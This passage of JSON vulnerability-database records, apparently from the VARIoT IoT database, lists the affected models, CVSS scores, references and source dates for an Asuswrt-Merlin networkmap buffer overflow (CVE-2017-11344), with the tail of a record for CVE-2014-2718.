"problemtype": "CWE-Other", "trust": 0.8 } ], "sources": [ { "db": "VULHUB", "id": "VHN-70657" }, { "db": "JVNDB", "id": "JVNDB-2014-005239" }, { "db": "NVD", "id": "CVE-2014-2718" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.5, "url": "http://seclists.org/fulldisclosure/2014/oct/122" }, { "trust": 2.3, "url": "http://www.securityfocus.com/bid/70791" }, { "trust": 2.1, "url": "http://dnlongen.blogspot.com/2014/10/cve-2014-2718-asus-rt-mitm.html" }, { "trust": 1.7, "url": "http://packetstormsecurity.com/files/128904/asus-router-man-in-the-middle.html" }, { "trust": 1.1, "url": "https://support.t-mobile.com/docs/doc-21994" }, { "trust": 1.1, "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/98316" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2718" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-2718" }, { "trust": 0.8, "url": "http://dnlongen.blogspot.jp/2014/10/cve-2014-2718-asus-rt-mitm.html" }, { "trust": 0.6, "url": "http://xforce.iss.net/xforce/xfdb/98316" }, { "trust": 0.3, "url": "http://www.asus.com/" }, { "trust": 0.1, "url": "http://dlcdnet.asus.com," }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2718" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2014-07699" }, { "db": "VULHUB", "id": "VHN-70657" }, { "db": "BID", "id": "70791" }, { "db": "JVNDB", "id": "JVNDB-2014-005239" }, { "db": "PACKETSTORM", "id": "128904" }, { "db": "CNNVD", "id": "CNNVD-201410-1415" }, { "db": "NVD", "id": "CVE-2014-2718" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CNVD", "id": "CNVD-2014-07699" }, { "db": "VULHUB", "id": "VHN-70657" }, { "db": "BID", "id": "70791" }, { "db": "JVNDB", "id": "JVNDB-2014-005239" }, { "db": "PACKETSTORM", "id": "128904" }, { "db": "CNNVD", "id": "CNNVD-201410-1415" }, { "db": "NVD", "id": "CVE-2014-2718" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-10-31T00:00:00", "db": "CNVD", "id": "CNVD-2014-07699" }, { "date": "2014-11-04T00:00:00", "db": "VULHUB", "id": "VHN-70657" }, { "date": "2014-10-28T00:00:00", "db": "BID", "id": "70791" }, { "date": "2014-11-07T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-005239" }, { "date": "2014-10-29T12:11:11", "db": "PACKETSTORM", "id": "128904" }, { "date": "2014-10-30T00:00:00", "db": "CNNVD", "id": "CNNVD-201410-1415" }, { "date": "2014-11-04T22:55:06.417000", "db": "NVD", "id": "CVE-2014-2718" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-10-31T00:00:00", "db": "CNVD", "id": "CNVD-2014-07699" }, { "date": "2017-08-29T00:00:00", "db": "VULHUB", "id": "VHN-70657" }, { "date": "2014-10-28T00:00:00", "db": "BID", "id": "70791" }, { "date": "2016-02-10T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-005239" }, { "date": "2014-11-05T00:00:00", "db": "CNNVD", "id": "CNNVD-201410-1415" }, { "date": "2024-11-21T02:06:49.693000", "db": "NVD", "id": "CVE-2014-2718" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201410-1415" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "ASUS RT Series router firmware arbitrary code execution vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-005239" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Design Error", "sources": [ { "db": "BID", "id": "70791" } ], "trust": 0.3 } }
var-201707-0387
Vulnerability from variot
Global buffer overflow in networkmap in Asuswrt-Merlin firmware for ASUS devices and ASUS firmware for ASUS RT-AC5300, RT_AC1900P, RT-AC68U, RT-AC68P, RT-AC88U, RT-AC66U, RT-AC66U_B1, RT-AC58U, RT-AC56U, RT-AC55U, RT-AC52U, RT-AC51U, RT-N18U, RT-N66U, RT-N56U, RT-AC3200, RT-AC3100, RT_AC1200GU, RT_AC1200G, RT-AC1200, RT-AC53, RT-N12HP, RT-N12HP_B1, RT-N12D1, RT-N12+, RT_N12+_PRO, RT-N16, and RT-N300 devices allows remote attackers to write shellcode at any address in the heap; this can be used to execute arbitrary code on the router by hosting a crafted device description XML document at a URL specified within a Location header in an SSDP response. ASUSRT-AC5300 and others are wireless routers from ASUS. A networkmap is one of the network diagram components. A buffer overflow vulnerability exists in networkmaps in several ASUS products
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201707-0387", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "rt-ac88u", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7743" }, { "model": "rt-ac52u", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.4180" }, { "model": "rt-ac66u b1", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7743" }, { "model": "rt-ac66u", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7743" }, { "model": "rt ac1900p", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7743" }, { "model": "rt-ac56u", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7743" }, { "model": "rt-ac51u", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7378" }, { "model": "rt-ac1200", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.9880" }, { "model": "rt-n12hp", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.2943" }, { "model": "rt-n12hp b1", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.3479" }, { "model": "rt-ac3100", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7743" }, { "model": "rt n12\\+ pro", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.9880" }, { "model": "rt-ac55u", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7378" }, { "model": "rt-ac58u", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7485" }, { "model": "rt-n16", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7378" }, { "model": "rt-n300", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7378" }, { "model": "rt-ac53", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.9883" }, { "model": "rt-ac68u", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7743" }, { "model": "rt-n18u", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7743" }, { "model": "rt-ac5300", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7743" }, { "model": "rt-n66u", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7378" }, { "model": "rt-n12\\+", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7378" }, { "model": "rt ac1200g", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.3167" }, { "model": "rt ac1200gu", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.5577" }, { "model": "rt-n56u", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.378.7177" }, { "model": "rt-ac68p", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7743" }, { "model": "rt-ac3200", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7743" }, { "model": "rt-n12d1", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7378" }, { "model": "rt ac1200g", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt ac1200gu", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt ac1900p", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt n12+ pro", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac1200", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac3100", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac3200", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac51u", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac52u", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac53", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac5300", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac55u", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac56u", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac58u", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac66u b1", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac66u", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac68p", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac68u", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac88u", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-n12+", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-n12d1", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-n12hp b1", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-n12hp", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-n16", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-n18u", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-n300", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-n56u", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-n66u", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-n56u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n66u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac5300", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt ac1900p", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac68u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac52u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac51u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n18u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac3200", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt ac1200gu", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac3100", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt ac1200g", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac1200", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac53", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n12hp", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n12hp b1", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n12d1", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n12+", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt n12+ pro", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n16", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n300", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac55u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac56u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac58u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac66u b1", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac66u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac88u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac68p", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n12hp b1", "scope": "eq", "trust": 0.6, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.3479" }, { "model": "rt-n12d1", "scope": "eq", "trust": 0.6, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7378" }, { "model": "rt-n12\\+", "scope": "eq", "trust": 0.6, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7378" }, { "model": "rt-n12hp", "scope": "eq", "trust": 0.6, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.2943" }, { "model": "rt-ac53", "scope": "eq", "trust": 0.6, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.9883" }, { "model": "rt n12\\+ pro", "scope": "eq", "trust": 0.6, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.9880" }, { "model": "rt-ac1200", "scope": "eq", "trust": 0.6, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.9880" }, { "model": "rt-ac3200", "scope": "eq", "trust": 0.6, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7743" }, { "model": "rt-n16", "scope": "eq", "trust": 0.6, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7378" }, { "model": "rt-n300", "scope": "eq", "trust": 0.6, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7378" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-35393" }, { "db": "JVNDB", "id": "JVNDB-2017-005983" }, { "db": "CNNVD", "id": "CNNVD-201707-768" }, { "db": "NVD", "id": "CVE-2017-11344" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt_ac1200g_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt_ac1200gu_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt_ac1900p_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt_n12%2B_pro_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac1200_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac3100_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac3200_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac51u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac52u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac53_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac5300_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac55u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac56u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac58u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac66u_b1_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac66u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac68p_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac68u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac88u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n12%2B_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n12d1_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n12hp_b1_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n12hp_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n16_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n18u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n300_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n56u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n66u_firmware", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-005983" } ] }, "cve": "CVE-2017-11344", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "CVE-2017-11344", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "CNVD-2017-35393", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "VHN-101757", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "LOCAL", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 1.8, "id": "CVE-2017-11344", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2017-11344", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2017-11344", "trust": 0.8, "value": "High" }, { "author": "CNVD", "id": "CNVD-2017-35393", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201707-768", "trust": 0.6, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-101757", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-35393" }, { "db": "VULHUB", "id": "VHN-101757" }, { "db": "JVNDB", "id": "JVNDB-2017-005983" }, { "db": "CNNVD", "id": "CNNVD-201707-768" }, { "db": "NVD", "id": "CVE-2017-11344" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Global buffer overflow in networkmap in Asuswrt-Merlin firmware for ASUS devices and ASUS firmware for ASUS RT-AC5300, RT_AC1900P, RT-AC68U, RT-AC68P, RT-AC88U, RT-AC66U, RT-AC66U_B1, RT-AC58U, RT-AC56U, RT-AC55U, RT-AC52U, RT-AC51U, RT-N18U, RT-N66U, RT-N56U, RT-AC3200, RT-AC3100, RT_AC1200GU, RT_AC1200G, RT-AC1200, RT-AC53, RT-N12HP, RT-N12HP_B1, RT-N12D1, RT-N12+, RT_N12+_PRO, RT-N16, and RT-N300 devices allows remote attackers to write shellcode at any address in the heap; this can be used to execute arbitrary code on the router by hosting a crafted device description XML document at a URL specified within a Location header in an SSDP response. ASUSRT-AC5300 and others are wireless routers from ASUS. A networkmap is one of the network diagram components. A buffer overflow vulnerability exists in networkmaps in several ASUS products", "sources": [ { "db": "NVD", "id": "CVE-2017-11344" }, { "db": "JVNDB", "id": "JVNDB-2017-005983" }, { "db": "CNVD", "id": "CNVD-2017-35393" }, { "db": "VULHUB", "id": "VHN-101757" } ], "trust": 2.25 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "OPENWALL", "id": "OSS-SECURITY/2017/07/14/3", "trust": 3.1 }, { "db": "NVD", "id": "CVE-2017-11344", "trust": 3.1 }, { "db": "JVNDB", "id": "JVNDB-2017-005983", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201707-768", "trust": 0.7 }, { "db": "CNVD", "id": "CNVD-2017-35393", "trust": 0.6 }, { "db": "SEEBUG", "id": "SSVID-97015", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-101757", "trust": 0.1 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-35393" }, { "db": "VULHUB", "id": "VHN-101757" }, { "db": "JVNDB", "id": "JVNDB-2017-005983" }, { "db": "CNNVD", "id": "CNNVD-201707-768" }, { "db": "NVD", "id": "CVE-2017-11344" } ] }, "id": "VAR-201707-0387", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2017-35393" }, { "db": "VULHUB", "id": "VHN-101757" } ], "trust": 1.342782942 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "Network device" ], "sub_category": null, "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-35393" } ] }, "last_update_date": "2024-11-23T22:56:11.437000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Top Page", "trust": 0.8, "url": "https://asuswrt.lostrealm.ca/" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-005983" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-101757" }, { "db": "JVNDB", "id": "JVNDB-2017-005983" }, { "db": "NVD", "id": "CVE-2017-11344" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.1, "url": "http://www.openwall.com/lists/oss-security/2017/07/14/3" }, { "trust": 1.1, "url": "https://asuswrt.lostrealm.ca/changelog" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-11344" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-11344" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-35393" }, { "db": "VULHUB", "id": "VHN-101757" }, { "db": "JVNDB", "id": "JVNDB-2017-005983" }, { "db": "CNNVD", "id": "CNNVD-201707-768" }, { "db": "NVD", "id": "CVE-2017-11344" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CNVD", "id": "CNVD-2017-35393" }, { "db": "VULHUB", "id": "VHN-101757" }, { "db": "JVNDB", "id": "JVNDB-2017-005983" }, { "db": "CNNVD", "id": "CNNVD-201707-768" }, { "db": "NVD", "id": "CVE-2017-11344" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-11-29T00:00:00", "db": "CNVD", "id": "CNVD-2017-35393" }, { "date": "2017-07-17T00:00:00", "db": "VULHUB", "id": "VHN-101757" }, { "date": "2017-08-14T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-005983" }, { "date": "2017-07-17T00:00:00", "db": "CNNVD", "id": "CNNVD-201707-768" }, { "date": "2017-07-17T13:18:20.923000", "db": "NVD", "id": "CVE-2017-11344" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-11-29T00:00:00", "db": "CNVD", "id": "CNVD-2017-35393" }, { "date": 